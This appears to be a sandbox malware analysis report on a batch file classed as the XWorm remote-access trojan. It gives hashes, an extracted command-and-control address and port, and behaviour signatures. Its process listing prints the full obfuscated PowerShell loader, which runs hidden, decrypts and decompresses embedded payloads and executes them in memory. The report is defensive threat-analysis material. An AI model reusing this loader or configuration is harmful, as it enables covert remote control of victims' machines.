Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Resubmissions
07/11/2024, 23:56
241107-3zdm8a1aml 10Analysis
-
max time kernel
13s -
max time network
14s -
platform
windows10-2004_x64 -
resource
win10v2004-20241007-en -
resource tags
arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system -
submitted
07/11/2024, 23:56
Static task
static1
Behavioral task
behavioral1
Sample
XClient (1).bat
Resource
win7-20240903-en
General
-
Target
XClient (1).bat
-
Size
72KB
-
MD5
73585d18685e06c4f21302c275ca6682
-
SHA1
dd0bae964a108a1c923a1f9b99e72f82064786dd
-
SHA256
b953aae6b09f2002ca056f6cef521960a91711152d5ebd5cf0055d9a491a5554
-
SHA512
00b2276e24b96b9b8c0629a1913f8a1c0ee7ab12e2fa4ce8f9b54fabeb02b0383eb183b1d45f16e86175108a9c7990f40a4671e29a2dde8400dbb60d3974b08a
-
SSDEEP
1536:PhOHtmQQ2yEPUWKzKbYd1P/OCWA7Vm6H/j5z5y3Wdjyh:YvTMKY1OCF0xWV+
Malware Config
Extracted
xworm
127.0.0.1:32758
pressure-continuous.gl.at.ply.gg:32758
-
Install_directory
%Temp%
-
install_file
USB.exe
Signatures
-
Detect Xworm Payload 1 IoCs
resource yara_rule behavioral2/memory/3528-15-0x0000024A65230000-0x0000024A65244000-memory.dmp family_xworm -
Xworm family
-
Blocklisted process makes network request 1 IoCs
flow pid Process 18 3528 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 3528 powershell.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 17 ip-api.com -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3528 powershell.exe 3528 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3528 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 708 wrote to memory of 3528 708 cmd.exe 89 PID 708 wrote to memory of 3528 708 cmd.exe 89
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\XClient (1).bat"1⤵
- Suspicious use of WriteProcessMemory
PID:708 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -command function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lt7J5oQYvdPE/yPR3udzzOgcuFCXB9kkjS82/1mR/YU='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('FE87bzzPEJCKUD9ywpxuRA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $WEOQY=New-Object System.IO.MemoryStream(,$param_var); $YzqMc=New-Object System.IO.MemoryStream; $DahLb=New-Object System.IO.Compression.GZipStream($WEOQY, [IO.Compression.CompressionMode]::Decompress); $DahLb.CopyTo($YzqMc); $DahLb.Dispose(); $WEOQY.Dispose(); $YzqMc.Dispose(); $YzqMc.ToArray();}function execute_function($param_var,$param2_var){ $RqagN=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $HUCEB=$RqagN.EntryPoint; $HUCEB.Invoke($null, $param2_var);}$host.UI.RawUI.WindowTitle = 'C:\Users\Admin\AppData\Local\Temp\XClient (1).bat';$qvcZY=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\AppData\Local\Temp\XClient (1).bat').Split([Environment]::NewLine);foreach ($zHSKO in $qvcZY) { if ($zHSKO.StartsWith(':: ')) { $VrWEJ=$zHSKO.Substring(3); break; }}$payloads_var=[string[]]$VrWEJ.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0])));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1])));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] (''));2⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3528
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82